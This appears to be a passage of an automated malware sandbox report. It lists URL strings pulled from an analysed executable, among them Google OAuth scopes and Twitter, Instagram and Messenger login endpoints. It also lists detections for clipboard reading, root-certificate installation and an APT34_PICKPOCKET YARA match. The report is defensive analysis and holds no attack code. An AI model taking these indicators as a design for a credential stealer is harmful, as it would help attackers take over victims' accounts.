Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 6272167835D47591.exe String found in binary or memory: https://mail.google.com/mail
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 6272167835D47591.exe String found in binary or memory: https://payments.google.com/
Source: 6272167835D47591.exe String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsOU2ZY
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://pki.goog/repository/0
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267631518.000000000412D000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/
Source: 6272167835D47591.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 6272167835D47591.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsJtW2YY
Source: 6272167835D47591.exe, 00000003.00000003.283424106.000000000089E000.00000004.00000001.sdmp, Web Data1611969904131.3.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 6272167835D47591.exe, 00000003.00000003.283424106.000000000089E000.00000004.00000001.sdmp, Web Data1611969904131.3.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: N1yprTBBXs.exe String found in binary or memory: https://tools.google.com/service/update
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/ookie:
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comReferer:
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 6272167835D47591.exe, 00000003.00000003.302210534.0000000004280000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com
Source: 6272167835D47591.exe, 00000003.00000003.302148348.00000000042C1000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx
Source: N1yprTBBXs.exe, 00000001.00000002.255579897.0000000002CC5000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000003.00000003.302223068.0000000003150000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000005.00000003.268428934.0000000004121000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp, ecvFD59.tmp.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=299872286.1601476511
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267658973.0000000004144000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267414589.000000000411E000.00000004.00000001.sdmp, ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/
Source: N1yprTBBXs.exe String found in binary or memory: https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN
Source: N1yprTBBXs.exe String found in binary or memory: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
Source: N1yprTBBXs.exe String found in binary or memory: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CNgoopyhttps://www.google.com/account
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 6272167835D47591.exe String found in binary or memory: https://www.google.com/cloudprint
Source: 6272167835D47591.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 6272167835D47591.exe String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 6272167835D47591.exe, 00000005.00000003.267414589.000000000411E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 6272167835D47591.exe, 00000005.00000003.267631518.000000000412D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint5
Source: 6272167835D47591.exe, 00000005.00000003.267414589.000000000411E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprintSX
Source: 6272167835D47591.exe, 00000003.00000003.283424106.000000000089E000.00000004.00000001.sdmp, Web Data1611969904131.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6272167835D47591.exe, 00000005.00000003.267414589.000000000411E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/~
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267658973.0000000004144000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267650074.000000000413E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourcUY
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevices0
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267650074.000000000413E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 6272167835D47591.exe, 00000005.00000003.267650074.000000000413E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetingsh
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetingsw
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwritecon
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierraappliVY
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxA
Source: 6272167835D47591.exe String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email?
Source: 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.emailSQ
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvFD59.tmp.10.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000005.00000003.267658973.0000000004144000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000003.265940715.0000000004112000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com;
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accept:
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/accept:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040AE4D OpenClipboard, 10_2_0040AE4D

E-Banking Fraud:

barindex
Registers a new ROOT certificate
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 3_2_1001F720
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey, 1_2_00456840

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.6272167835D47591.exe.3520000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 3.2.6272167835D47591.exe.33d0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: N1yprTBBXs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6272167835D47591.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040C516 NtQuerySystemInformation, 10_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 10_2_0040C6FB
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001DA70: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, 3_2_1001DA70
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004DC4D0 CloseHandle,_memset,CreateProcessAsUserW,GetLastError,CloseHandle,AssignProcessToJobObject,GetLastError,CloseHandle,SetThreadToken,ResumeThread,CloseHandle, 1_2_004DC4D0
Detected potential crypto function
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004EFF70 1_2_004EFF70
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004F001D 1_2_004F001D
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00478010 1_2_00478010
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0045E020 1_2_0045E020
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00416030 1_2_00416030
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004510C0 1_2_004510C0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004220D0 1_2_004220D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004390A0 1_2_004390A0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00502169 1_2_00502169
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0041F1E0 1_2_0041F1E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004731E0 1_2_004731E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0043D2D0 1_2_0043D2D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004AB2E0 1_2_004AB2E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0042B2A0 1_2_0042B2A0
